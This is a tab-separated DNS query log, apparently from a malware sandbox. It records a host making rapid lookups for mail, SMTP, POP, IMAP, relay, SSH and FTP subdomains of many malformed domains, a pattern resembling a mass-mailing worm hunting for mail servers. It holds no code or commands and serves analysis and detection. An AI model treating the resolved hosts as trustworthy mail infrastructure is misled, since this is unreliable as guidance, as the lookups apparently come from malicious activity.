Nov 30, 2023 11:23:22.356086016 CET	1.1.1.1	192.168.2.4	0x765	No error (0)	mx192.m2bp.com		147.182.130.78	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.356086016 CET	1.1.1.1	192.168.2.4	0x765	No error (0)	mx192.m2bp.com		164.90.197.162	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.356086016 CET	1.1.1.1	192.168.2.4	0x765	No error (0)	mx192.m2bp.com		147.182.180.139	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.367854118 CET	1.1.1.1	192.168.2.4	0x70c7	Name error (3)	ssh.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.368828058 CET	1.1.1.1	192.168.2.4	0xc178	Name error (3)	ftp.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.410695076 CET	1.1.1.1	192.168.2.4	0x94a8	No error (0)	qoil.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.416661024 CET	1.1.1.1	192.168.2.4	0x3c4d	Name error (3)	ssh.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.429141045 CET	1.1.1.1	192.168.2.4	0x1283	No error (0)	sell.sawbrokers.com		85.10.133.119	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.429297924 CET	1.1.1.1	192.168.2.4	0xa920	Name error (3)	mail.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.429315090 CET	1.1.1.1	192.168.2.4	0x90f2	Server failure (2)	mail.yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.429426908 CET	1.1.1.1	192.168.2.4	0x8504	Name error (3)	pop.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.432997942 CET	1.1.1.1	192.168.2.4	0x86ae	Name error (3)	ftp.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.435519934 CET	1.1.1.1	192.168.2.4	0xb360	Name error (3)	mail.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.439260960 CET	1.1.1.1	192.168.2.4	0x96ef	No error (0)	mx1.aamail.co.uk		82.71.214.1	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.482150078 CET	1.1.1.1	192.168.2.4	0xc178	Name error (3)	ftp.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.501946926 CET	1.1.1.1	192.168.2.4	0x345d	Name error (3)	pop.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.507365942 CET	1.1.1.1	192.168.2.4	0x22a3	Name error (3)	mail.mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.508459091 CET	1.1.1.1	192.168.2.4	0x23b4	Name error (3)	ssh.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.512217045 CET	1.1.1.1	192.168.2.4	0x23df	Name error (3)	ssh.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.519742012 CET	1.1.1.1	192.168.2.4	0xaa57	Name error (3)	ssh.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.530015945 CET	1.1.1.1	192.168.2.4	0x534	Name error (3)	ftp.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.549309015 CET	1.1.1.1	192.168.2.4	0xf388	Name error (3)	pop.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.553766012 CET	1.1.1.1	192.168.2.4	0x2ce7	Name error (3)	ftp.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.554775953 CET	1.1.1.1	192.168.2.4	0x957d	Name error (3)	ftp.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.594295025 CET	1.1.1.1	192.168.2.4	0x4d16	Name error (3)	ssh.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.597456932 CET	1.1.1.1	192.168.2.4	0xaa57	Name error (3)	ssh.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.603473902 CET	1.1.1.1	192.168.2.4	0x25f9	Name error (3)	mail.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.603617907 CET	1.1.1.1	192.168.2.4	0x8136	Server failure (2)	ftp.yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.612443924 CET	1.1.1.1	192.168.2.4	0x411b	Name error (3)	pop.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.618691921 CET	1.1.1.1	192.168.2.4	0xc9f9	Name error (3)	ftp.mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.643403053 CET	1.1.1.1	192.168.2.4	0x533a	Name error (3)	imap.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.648379087 CET	1.1.1.1	192.168.2.4	0x2d72	Name error (3)	mail.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.656563997 CET	1.1.1.1	192.168.2.4	0x204c	Name error (3)	ftp.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.661474943 CET	1.1.1.1	192.168.2.4	0x2ce7	Name error (3)	ftp.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.665194035 CET	1.1.1.1	192.168.2.4	0x1410	Name error (3)	ftp.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.667210102 CET	1.1.1.1	192.168.2.4	0x82f3	Name error (3)	ftp.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.678760052 CET	1.1.1.1	192.168.2.4	0x3c85	Name error (3)	mail.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.679111958 CET	1.1.1.1	192.168.2.4	0xe196	Name error (3)	ssh.mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.682212114 CET	1.1.1.1	192.168.2.4	0xdab	Name error (3)	mail.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.716629982 CET	1.1.1.1	192.168.2.4	0x3813	Name error (3)	mail.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.716639996 CET	1.1.1.1	192.168.2.4	0x3813	Name error (3)	mail.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.719425917 CET	1.1.1.1	192.168.2.4	0x5285	Name error (3)	ftp.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.743508101 CET	1.1.1.1	192.168.2.4	0xa488	Name error (3)	ftp.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.750983953 CET	1.1.1.1	192.168.2.4	0xb039	Name error (3)	ssh.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.753494978 CET	1.1.1.1	192.168.2.4	0xc396	Server failure (2)	ssh.yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.758040905 CET	1.1.1.1	192.168.2.4	0x1025	Name error (3)	imap.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.758683920 CET	1.1.1.1	192.168.2.4	0x6b27	Name error (3)	mail.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.767823935 CET	1.1.1.1	192.168.2.4	0x5ec5	Name error (3)	imap.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.769310951 CET	1.1.1.1	192.168.2.4	0xdab	Name error (3)	mail.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.777832031 CET	1.1.1.1	192.168.2.4	0xe3f1	Name error (3)	ftp.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.789530039 CET	1.1.1.1	192.168.2.4	0xc61b	Name error (3)	imap.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.830347061 CET	1.1.1.1	192.168.2.4	0x47e9	Name error (3)	ssh.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.849773884 CET	1.1.1.1	192.168.2.4	0x1228	Name error (3)	mail.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.853375912 CET	1.1.1.1	192.168.2.4	0x9584	Name error (3)	ssh.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.871968985 CET	1.1.1.1	192.168.2.4	0x4a45	Name error (3)	pop.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.872054100 CET	1.1.1.1	192.168.2.4	0x4a45	Name error (3)	pop.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.885236979 CET	1.1.1.1	192.168.2.4	0x6c52	Name error (3)	ssh.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.887634993 CET	1.1.1.1	192.168.2.4	0xdb2e	Name error (3)	mail.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.888884068 CET	1.1.1.1	192.168.2.4	0x5337	Name error (3)	mail.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.898329020 CET	1.1.1.1	192.168.2.4	0x3690	Name error (3)	pop.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.899158955 CET	1.1.1.1	192.168.2.4	0x33c4	Name error (3)	pop3.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.901037931 CET	1.1.1.1	192.168.2.4	0x3020	Name error (3)	pop.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.903620958 CET	1.1.1.1	192.168.2.4	0xf7ee	Server failure (2)	pop.yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.924230099 CET	1.1.1.1	192.168.2.4	0x4944	Name error (3)	ssh.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.964719057 CET	1.1.1.1	192.168.2.4	0x6c52	Name error (3)	ssh.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:22.984076023 CET	1.1.1.1	192.168.2.4	0xf854	Name error (3)	imap.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.000766993 CET	1.1.1.1	192.168.2.4	0x374a	Name error (3)	imap.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.002933979 CET	1.1.1.1	192.168.2.4	0xdb2e	Name error (3)	mail.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.003290892 CET	1.1.1.1	192.168.2.4	0x4944	Name error (3)	ssh.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.003483057 CET	1.1.1.1	192.168.2.4	0xf854	Name error (3)	imap.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.007626057 CET	1.1.1.1	192.168.2.4	0xe84c	Name error (3)	pop3.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.074383974 CET	1.1.1.1	192.168.2.4	0x652f	Name error (3)	pop.mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.074398041 CET	1.1.1.1	192.168.2.4	0x369a	Name error (3)	pop3.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.104897022 CET	1.1.1.1	192.168.2.4	0x213e	Name error (3)	ssh.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.131959915 CET	1.1.1.1	192.168.2.4	0x278	Name error (3)	ssh.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.137752056 CET	1.1.1.1	192.168.2.4	0x4f46	Name error (3)	pop.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.140161037 CET	1.1.1.1	192.168.2.4	0x1f5d	Name error (3)	imap.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.141868114 CET	1.1.1.1	192.168.2.4	0x211d	Server failure (2)	imap.yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.207284927 CET	1.1.1.1	192.168.2.4	0x213e	Name error (3)	ssh.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.216320038 CET	1.1.1.1	192.168.2.4	0xfa21	Name error (3)	imap.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.217581987 CET	1.1.1.1	192.168.2.4	0x5dc3	Name error (3)	ssh.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.227585077 CET	1.1.1.1	192.168.2.4	0xe074	Name error (3)	pop.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.229028940 CET	1.1.1.1	192.168.2.4	0x94b8	Name error (3)	pop.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.236077070 CET	1.1.1.1	192.168.2.4	0xfae2	Name error (3)	imap.mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.236888885 CET	1.1.1.1	192.168.2.4	0x932	Name error (3)	pop.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.240938902 CET	1.1.1.1	192.168.2.4	0x3682	Name error (3)	pop3.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.323102951 CET	1.1.1.1	192.168.2.4	0xb64c	Name error (3)	pop.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.339893103 CET	1.1.1.1	192.168.2.4	0x6f47	Name error (3)	mailgate.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.369388103 CET	1.1.1.1	192.168.2.4	0xca67	Name error (3)	pop.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.398469925 CET	1.1.1.1	192.168.2.4	0xa2d	Name error (3)	imap.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.412520885 CET	1.1.1.1	192.168.2.4	0x9ab0	Name error (3)	pop3.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.419931889 CET	1.1.1.1	192.168.2.4	0xc229	Name error (3)	pop.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.419946909 CET	1.1.1.1	192.168.2.4	0x1092	Name error (3)	imap.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.421360016 CET	1.1.1.1	192.168.2.4	0x9268	Name error (3)	mailgate.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.463568926 CET	1.1.1.1	192.168.2.4	0x6e5b	Name error (3)	smtp.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.507112026 CET	1.1.1.1	192.168.2.4	0x86b6	Name error (3)	pop.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.521044970 CET	1.1.1.1	192.168.2.4	0x6e5b	Name error (3)	smtp.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.531564951 CET	1.1.1.1	192.168.2.4	0x2605	Name error (3)	mailgate.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.534790993 CET	1.1.1.1	192.168.2.4	0xc75d	Name error (3)	imap.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.538940907 CET	1.1.1.1	192.168.2.4	0x3e41	Name error (3)	mailgate.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.541606903 CET	1.1.1.1	192.168.2.4	0x5177	Name error (3)	pop.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.592313051 CET	1.1.1.1	192.168.2.4	0xd2ea	Name error (3)	imap.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.607479095 CET	1.1.1.1	192.168.2.4	0x3174	Name error (3)	pop3.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.613440990 CET	1.1.1.1	192.168.2.4	0x86b6	Name error (3)	pop.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.643687963 CET	1.1.1.1	192.168.2.4	0x91ec	Name error (3)	pop3.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.670504093 CET	1.1.1.1	192.168.2.4	0x91ec	Name error (3)	pop3.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.670995951 CET	1.1.1.1	192.168.2.4	0x5177	Name error (3)	pop.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.671114922 CET	1.1.1.1	192.168.2.4	0x3174	Name error (3)	pop3.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.671824932 CET	1.1.1.1	192.168.2.4	0xd2ea	Name error (3)	imap.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.681313992 CET	1.1.1.1	192.168.2.4	0x443e	Name error (3)	imap.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.690155029 CET	1.1.1.1	192.168.2.4	0x5131	Name error (3)	mailgate.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.690612078 CET	1.1.1.1	192.168.2.4	0xf353	Name error (3)	smtp.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.698052883 CET	1.1.1.1	192.168.2.4	0xd9c	Name error (3)	imap.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.705784082 CET	1.1.1.1	192.168.2.4	0xa480	Name error (3)	imap.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.711968899 CET	1.1.1.1	192.168.2.4	0x7de5	Name error (3)	pop.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.729064941 CET	1.1.1.1	192.168.2.4	0x259c	Name error (3)	smtp.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.750202894 CET	1.1.1.1	192.168.2.4	0x9bd0	Name error (3)	pop3.mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.759165049 CET	1.1.1.1	192.168.2.4	0x36f4	Name error (3)	mailgate.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.761308908 CET	1.1.1.1	192.168.2.4	0x7179	Name error (3)	smtp.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.764086008 CET	1.1.1.1	192.168.2.4	0x57f3	Name error (3)	pop3.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.772511959 CET	1.1.1.1	192.168.2.4	0x688c	Name error (3)	mailgate.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.772836924 CET	1.1.1.1	192.168.2.4	0xd1ba	Server failure (2)	pop3.yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.791356087 CET	1.1.1.1	192.168.2.4	0x7c2c	Name error (3)	pop3.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.794990063 CET	1.1.1.1	192.168.2.4	0xcc39	Name error (3)	mailgate.mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.799350023 CET	1.1.1.1	192.168.2.4	0x5641	Name error (3)	pop3.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.823462963 CET	1.1.1.1	192.168.2.4	0xef80	Name error (3)	relay.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.825968981 CET	1.1.1.1	192.168.2.4	0xcf16	Name error (3)	relay.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.826899052 CET	1.1.1.1	192.168.2.4	0xdd28	Name error (3)	relay.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.829642057 CET	1.1.1.1	192.168.2.4	0xfd6a	Name error (3)	mailgate.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.847457886 CET	1.1.1.1	192.168.2.4	0x3cee	Name error (3)	ssh.noweco.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.855887890 CET	1.1.1.1	192.168.2.4	0x8915	Name error (3)	pop3.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.856475115 CET	1.1.1.1	192.168.2.4	0x5041	Name error (3)	mail.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.857362032 CET	1.1.1.1	192.168.2.4	0xd26	Name error (3)	pop3.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.858643055 CET	1.1.1.1	192.168.2.4	0x86d	Server failure (2)	mailgate.yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.859756947 CET	1.1.1.1	192.168.2.4	0x3012	Name error (3)	smtp.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.895509958 CET	1.1.1.1	192.168.2.4	0x89db	Name error (3)	smtp.mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.896054983 CET	1.1.1.1	192.168.2.4	0xbdd7	Name error (3)	mailgate.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.898631096 CET	1.1.1.1	192.168.2.4	0xb162	Server failure (2)	smtp.yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.917711973 CET	1.1.1.1	192.168.2.4	0x4479	Name error (3)	mailgate.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.945292950 CET	1.1.1.1	192.168.2.4	0x99a6	Name error (3)	imap.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.953113079 CET	1.1.1.1	192.168.2.4	0x84d8	Name error (3)	mailgate.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.954551935 CET	1.1.1.1	192.168.2.4	0x50ce	Name error (3)	imap.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.956513882 CET	1.1.1.1	192.168.2.4	0x3cee	Name error (3)	ssh.noweco.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.956756115 CET	1.1.1.1	192.168.2.4	0x4479	Name error (3)	mailgate.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.957799911 CET	1.1.1.1	192.168.2.4	0x88a	Name error (3)	pop3.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.958997965 CET	1.1.1.1	192.168.2.4	0xc7d	Name error (3)	pop3.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:23.966882944 CET	1.1.1.1	192.168.2.4	0x6e3d	Name error (3)	smtp.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.004694939 CET	1.1.1.1	192.168.2.4	0x52d9	Name error (3)	smtp.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.023643970 CET	1.1.1.1	192.168.2.4	0xa056	Name error (3)	relay.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.025897026 CET	1.1.1.1	192.168.2.4	0x2ce9	Name error (3)	pop3.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.034404993 CET	1.1.1.1	192.168.2.4	0x50ce	Name error (3)	imap.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.049921989 CET	1.1.1.1	192.168.2.4	0x4a6	Name error (3)	pop3.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.071994066 CET	1.1.1.1	192.168.2.4	0x8be7	Name error (3)	mailgate.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.074212074 CET	1.1.1.1	192.168.2.4	0x1ef0	Name error (3)	relay.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.074749947 CET	1.1.1.1	192.168.2.4	0x71c9	Name error (3)	smtp.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.074834108 CET	1.1.1.1	192.168.2.4	0x25bd	Name error (3)	e1a73a.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.078023911 CET	1.1.1.1	192.168.2.4	0x3f04	Name error (3)	smtp.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.097292900 CET	1.1.1.1	192.168.2.4	0x2ce9	Name error (3)	pop3.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.097501993 CET	1.1.1.1	192.168.2.4	0x99a6	Name error (3)	imap.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.097881079 CET	1.1.1.1	192.168.2.4	0x4a6	Name error (3)	pop3.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.106067896 CET	1.1.1.1	192.168.2.4	0x331f	Name error (3)	smtp.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.107953072 CET	1.1.1.1	192.168.2.4	0xc3b7	Name error (3)	smtp.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.108366013 CET	1.1.1.1	192.168.2.4	0x5c7b	Name error (3)	e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.110418081 CET	1.1.1.1	192.168.2.4	0xc7ed	Name error (3)	joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.118664980 CET	1.1.1.1	192.168.2.4	0x329d	Name error (3)	pop3.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.132579088 CET	1.1.1.1	192.168.2.4	0xb388	Name error (3)	smtp.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.136111021 CET	1.1.1.1	192.168.2.4	0xeead	Name error (3)	mailgate.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.137181997 CET	1.1.1.1	192.168.2.4	0x720e	Name error (3)	xezail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.144953012 CET	1.1.1.1	192.168.2.4	0x5d17	Name error (3)	joaionlnal.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.145885944 CET	1.1.1.1	192.168.2.4	0xa056	Name error (3)	relay.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.147144079 CET	1.1.1.1	192.168.2.4	0x333e	Name error (3)	relay.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.148380041 CET	1.1.1.1	192.168.2.4	0xcf61	Name error (3)	ciszxujgaiatail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
